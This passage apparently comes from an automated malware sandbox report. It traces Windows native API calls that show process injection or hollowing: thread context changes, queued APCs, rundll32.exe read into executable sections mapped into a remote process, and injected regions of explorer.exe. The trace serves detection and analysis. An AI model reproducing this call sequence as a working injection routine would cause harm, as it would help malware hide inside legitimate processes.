[283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0178.020] NtSetContextThread (ThreadHandle=0xc4, Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xd0, [65]=0x1c, [66]=0x22, [67]=0x5f, [68]=0xfb, [69]=0x7f, [70]=0x0, [71]=0x0, [72]=0xb0, [73]=0x40, [74]=0xf, [75]=0x5f, [76]=0xfb, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x6133d0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x600000, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0xff000000, ExtendedRegisters=([0]=0xff, [1]=0xf, [2]=0x0, [3]=0x0, [4]=0x20, [5]=0xf3, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x9d, [23]=0x5f, [24]=0xfb, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xa0, [29]=0xa, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x33, [39]=0x5f, [40]=0xfb, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0xc8, [46]=0xe0, [47]=0x8, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x3e, [213]=0xf, [214]=0xe9, [215]=0x41, [216]=0xc1, [217]=0x56, [218]=0x33, [219]=0x46, [220]=0x81, [221]=0xc3, [222]=0x6e, [223]=0x8b, [224]=0xac, [225]=0x8b, [226]=0xdd, [227]=0x70, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0178.021] NtQueueApcThread (ThreadHandle=0xc4, ApcRoutine=0x8e0c909, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0178.026] NtResumeThread (in: ThreadHandle=0xc4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0178.026] NtClose (Handle=0xc0) returned 0x0 [0178.026] NtClose (Handle=0xc4) returned 0x0 [0178.026] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x19e05c | out: BaseAddress=0x19e05c*=0x74cb0000) returned 0x0 [0178.058] PostThreadMessageW (idThread=0x5d4, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0178.102] NtDelayExecution (Alertable=0, Interval=0x19e0d4*=-30000000) returned 0x0 [0181.128] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0x8e52000, Buffer=0x19e0f8, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x19e0f8*, NumberOfBytesRead=0x0) returned 0x0 [0181.129] NtClose (Handle=0x80) returned 0x0 [0181.129] NtOpenProcess (in: ProcessHandle=0x19f1d4, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0xf98, UniqueThread=0x0) | out: ProcessHandle=0x19f1d4*=0x80) returned 0x0 [0181.132] NtOpenThread (in: ThreadHandle=0x19f1d8, DesiredAccess=0x1a, ObjectAttributes=0x19ea94, ClientId=0x19ea60*(UniqueProcess=0x0, UniqueThread=0xf9c) | out: ThreadHandle=0x19f1d8*=0xd0) returned 0x0 [0181.132] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\rundll32.exe", NtPathName=0x19e098, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\rundll32.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.133] NtCreateFile (in: FileHandle=0x19e0b8, DesiredAccess=0x120089, ObjectAttributes=0x19e080*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\rundll32.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e0a0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e0b8*=0xd4, IoStatusBlock=0x19e0a0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0181.133] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7495c0) returned 1 [0181.133] NtQueryInformationFile (in: FileHandle=0xd4, IoStatusBlock=0x19e0a0, FileInformation=0x19dff8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19e0a0, FileInformation=0x19dff8) returned 0x0 [0181.133] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xd600) returned 0x74a8e8 [0181.138] NtReadFile (in: FileHandle=0xd4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19e0a0, Buffer=0x74a8e8, BufferLength=0xd200, ByteOffset=0x19e010*=0, Key=0x0 | out: IoStatusBlock=0x19e0a0, Buffer=0x74a8e8*) returned 0x0 [0181.139] NtClose (Handle=0xd4) returned 0x0 [0181.139] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x12001) returned 0x757ef0 [0181.141] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74a8e8) returned 1 [0181.141] NtQueryInformationProcess (in: ProcessHandle=0x80, ProcessInformationClass=0x0, ProcessInformation=0x19e404, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e404, ReturnLength=0x0) returned 0x0 [0181.142] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0x3b1008, Buffer=0x19efc8, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x19efc8*, NumberOfBytesRead=0x0) returned 0x0 [0181.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x520000, RegionSize=0x19eab0, FreeType=0x8000) returned 0x0 [0181.143] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0x840000, Buffer=0x757ef0, NumberOfBytesToRead=0x12000, NumberOfBytesRead=0x0 | out: Buffer=0x757ef0*, NumberOfBytesRead=0x0) returned 0x0 [0181.144] NtCreateSection (in: SectionHandle=0x19f264, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19f264*=0xd4) returned 0x0 [0181.144] NtMapViewOfSection (in: SectionHandle=0xd4, ProcessHandle=0xffffffff, BaseAddress=0x19f260*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19f260*=0x6c0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x29000) returned 0x0 [0181.145] NtMapViewOfSection (in: SectionHandle=0xd4, ProcessHandle=0x80, BaseAddress=0x19ed20*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ef4c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed20*=0x110000, SectionOffset=0x0, ViewSize=0x19ef4c*=0x29000) returned 0x0 [0181.147] NtCreateSection (in: SectionHandle=0x19efc0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eac8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19efc0*=0xd8) returned 0x0 [0181.147] NtMapViewOfSection (in: SectionHandle=0xd8, ProcessHandle=0xffffffff, BaseAddress=0x19efc4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eac8*=0x12000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc4*=0x520000, SectionOffset=0x0, ViewSize=0x19eac8*=0x12000) returned 0x0 [0181.149] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x757ef0) returned 1 [0181.154] NtUnmapViewOfSection (ProcessHandle=0x80, BaseAddress=0x840000) returned 0x0 [0181.155] NtMapViewOfSection (in: SectionHandle=0xd8, ProcessHandle=0x80, BaseAddress=0x19efc8*=0x840000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f1f4*=0x12000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc8*=0x840000, SectionOffset=0x0, ViewSize=0x19f1f4*=0x12000) returned 0x0 [0181.163] NtResumeThread (in: ThreadHandle=0xd0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0181.200] ExitProcess (uExitCode=0x0) Thread: id = 32 os_tid = 0xf94 Process: id = "6" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x39520000" os_pid = "0x5d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 724 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 725 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 726 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 727 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 728 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 729 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 730 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 731 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 732 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 733 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 734 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 735 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 736 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 737 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 738 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 739 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 740 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 741 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 742 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 743 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 744 start_va = 0x4e0000 end_va = 0x4f2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 745 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 746 start_va = 0x510000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000019.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000019.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000019.db") Region: id = 747 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 748 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 749 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 750 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 751 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 752 start_va = 0x670000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 753 start_va = 0x800000 end_va = 0x801fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 754 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 755 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 756 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 757 start_va = 0x1db0000 end_va = 0x21aafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 758 start_va = 0x21b0000 end_va = 0x21ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 759 start_va = 0x21e0000 end_va = 0x21e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 760 start_va = 0x21f0000 end_va = 0x21f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 761 start_va = 0x2200000 end_va = 0x2201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 762 start_va = 0x2210000 end_va = 0x2210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 763 start_va = 0x2220000 end_va = 0x2220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 764 start_va = 0x2230000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 765 start_va = 0x22b0000 end_va = 